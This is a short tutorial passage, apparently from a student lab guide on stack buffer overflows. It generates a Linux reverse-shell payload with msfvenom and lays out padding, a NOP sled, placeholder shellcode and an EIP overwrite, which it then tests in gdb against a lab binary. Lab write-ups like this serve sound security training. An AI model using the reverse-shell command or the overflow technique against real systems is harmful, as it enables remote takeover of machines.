Shellcode

There are many ways to make shellcode like Donut or msfvenom. When using shellcode we need to now how big it will be.

$ msfvenom -p linux/x86/shell_reverse_tcp LHOST=127.0.0.1 lport=31337 --platform linux --arch x86 --format c

No encoder or badchars specified, outputting raw payload
Payload size: 68 bytes

Our payload is 68 bytes, take a larger range if shellcode increase later. We can insert no operation instruction or (NOPS) before our shellcode begins so its executed cleanly.

We need 1040 bytes to get to the EIP
Use additional 100 bytes of NOPs
150 for our shellcode.

   Buffer = "\x55" * (1040 - 100 - 150 - 4) = 786
     NOPs = "\x90" * 100
Shellcode = "\x44" * 150
      EIP = "\x66" * 4

How much space we have available to insert our shellcode.

(gdb) run $(python -c 'print "\x55" * (1040 - 100 - 150 - 4) + "\x90" * 100 + "\x44" * 150 + "\x66" * 4')

The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/student/bow/bow32 $(python -c 'print "\x55" * (1040 - 100 - 150 - 4) + "\x90" * 100 + "\x44" * 150 + "\x66" * 4')
Program received signal SIGSEGV, Segmentation fault.
0x66666666 in ?? ()

Last updated 1 month ago

Was this helpful?